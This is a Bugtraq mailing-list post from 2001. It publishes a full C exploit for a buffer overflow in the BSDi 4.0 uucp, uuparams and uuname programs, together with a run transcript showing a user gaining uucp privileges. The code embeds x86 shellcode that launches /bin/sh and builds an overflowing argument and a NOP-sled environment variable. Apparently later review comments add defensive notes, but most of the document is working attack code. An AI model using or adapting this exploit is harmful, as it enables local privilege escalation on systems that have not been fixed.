(BSDi/4.0-specific)uucp family exploit. (uucp/uuparams/uuname)
Date: 3 Dec 2001 03:34:27 -0000
From: Vade 79 <v9@fakehalo.deadpig.org>
To: bugtraq@securityfocus.com
Subject: (BSDi/4.0-specific)uucp family exploit. (uucp/uuparams/uuname)
-- usage start --
bash-2.02$ id
uid=123(t) gid=100(user) groups=100(user)
bash-2.02$ cc bsdi_uucp.c -o bsdi_uucp
bash-2.02$ ./bsdi_uucp -uuparams
[ (BSDi/4.0)uucp*[]: family buffer overflow, by:
v9@fakehalo.deadpig.org. ]
*** [data]: return address: 0x80474, program:
/usr/sbin/uuparams.
$ id
uid=123(t) euid=6(uucp) gid=100(user) egid=6(uucp)
groups=6(uucp), 100(user)
$
-- usage end --
-- bsdi_uucp.c start --
/* Buffer overflow in the BSDi uucp family (uucp, uuparams, uuname), by
v9@fakehalo.deadpig.org. On BSDi/4.0 systems this yields
euid/egid/group=6(uucp). The exploit is BSDi-specific.
*/
/* Absolute paths of the three programs this listing can launch; main()
   picks one of them from the first command-line argument. */
#define UUCP "/usr/bin/uucp"
#define UUPARAMS "/usr/sbin/uuparams"
#define UUNAME "/usr/bin/uuname"
/* One-character placeholder passed to the target ahead of the long
   argument built in main(). */
#define FILLER "x"
/* Opaque x86 machine-code payload. The array holds 46 bytes counting the
   explicit trailing \x00, so strlen(exec) as used in main() reports 45.
   The bytes \x2f\x62\x69\x6e\x2f\x73\x68 near the end are ASCII "/bin/sh".
   NOTE(review): the listing carries no #include lines, so printf, exit,
   strlen, memcpy, putenv, strncasecmp and execl are all used without
   prototypes. */
static char exec[]=
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46"
"\xfa\x89\x46\x0c\x89\x76\x08\x50\x8d\x5e"
"\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff"
"\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x00"; /* 46 chars. */
/* Print the one-line syntax summary for the given program name on
   standard output, then terminate the process with exit status 1.
   This function never returns to its caller. */
void usage(char *progname){
    fprintf(stdout,
            "*** [syntax]: %s <-uucp|-uuparams|-uuname>\n",
            progname);
    exit(1);
}
/* Yields the current stack pointer: the inline assembly copies %esp into
   %eax and the function has no return statement, so the caller sees the
   value only because the 32-bit x86 convention returns integers in %eax.
   NOTE(review): this is compiler- and architecture-dependent; using the
   result of a non-void function that falls off its end is undefined in C. */
long pointer(void){__asm__("movl %esp,%eax");}
/* Entry point. Selects one of the three target paths from av[1], builds a
   long command-line argument (eip) and an environment string (buf), and
   then replaces this process with the target through execl().

   Review notes, defender's view:
   - What the target receives is an argument of roughly 1 KB made of a
     repeated address value, plus an EXEC= environment entry of roughly
     4 KB. An exec of uucp, uuparams or uuname with inputs of that size is
     the observable this code produces.
   - The transcript published with this listing shows euid/egid changing
     to 6(uucp) after the run, so the targets presumably execute with uucp
     privilege through set-id bits (confirm on the host). Where UUCP is
     not in use, removing those bits from the three binaries removes the
     privilege gain independently of the overflow itself.
   - The listing contains undefined behaviour of its own; see the notes on
     the individual statements below. */
int main(int ac,char **av){
unsigned short type=0;
unsigned int i=0;
long ret;
char eip[1024],buf[4096];
char *progptr;
printf("[ (BSDi/4.0)uucp*[]: family buffer o"
"verflow, by: v9@fakehalo.deadpig.org. ]\n");
/* Option matching is a case-insensitive prefix compare, so any av[1] that
   merely starts with one of the three option names is accepted. usage()
   exits, which means progptr is assigned on every path that continues.
   type records whether the target is uucp (1) or one of the others (0). */
if(ac>1){
if(!strncasecmp(av[1],"-uucp",5)){
progptr=UUCP;
type=1;
}
else if(!strncasecmp(av[1],"-uuparams",9)){
progptr=UUPARAMS;
type=0;
}
else if(!strncasecmp(av[1],"-uuname",7)){
progptr=UUNAME;
type=0;
}
else
usage(av[0]);
}
else
usage(av[0]);
/* Address value derived from this process's own stack pointer plus
   sizeof(buf) (4096). Nothing here checks it against the target. */
ret=(pointer()+sizeof(buf));
/* Three 0x01 lead-in bytes, then ret stored repeatedly at offsets 3, 7, ...
   NOTE(review): the stores go through a char-to-long pointer cast at
   misaligned offsets; the final iteration (i == 1023) and the terminator
   written at eip[i] afterwards (i is 1027 once the loop ends) both land
   past the end of the 1024-byte array. */
eip[0]=0x01;eip[1]=0x01;eip[2]=0x01;
for(i=3;i<1024;i+=4){*(long *)&eip[i]=ret;}
/* The second statement on the next line fills buf with 0x90 bytes for
   sizeof(buf) - strlen(exec) - strlen(eip) positions. */
eip[i]=0x0;for(i=0;i<(sizeof(buf)-
strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
/* Payload is copied directly after the fill. NOTE(review): this code never
   writes a NUL terminator into buf, although putenv() expects a string. */
memcpy(buf+i,exec,strlen(exec));
/* The first five fill bytes become "EXEC=", so buf is exported as the
   environment variable EXEC. */
memcpy(buf,"EXEC=",5);putenv(buf);
printf("*** [data]: return address: 0x%lx, p"
"rogram: %s.\n",ret,progptr);
/* Argument order given to the target: FILLER first; for uucp (type == 1)
   a second FILLER and then the long argument, otherwise the long argument
   second. execl() returns only on failure, so the if-body is the error
   path and exit(0) is not reached after a successful exec.
   NOTE(review): the variadic list is terminated with a bare 0 rather than
   (char *)0. */
if(execl(progptr,progptr,FILLER,
(type?FILLER:eip),(type?eip:0),0)){
printf("*** [error]: could not execute %s s"
"uccessfully.\n",progptr);
exit(1);
}
exit(0);
}
-- bsdi_uucp.c end --
Vade79 -> v9@fakehalo.deadpig.org ->
fakehalo.deadpig.org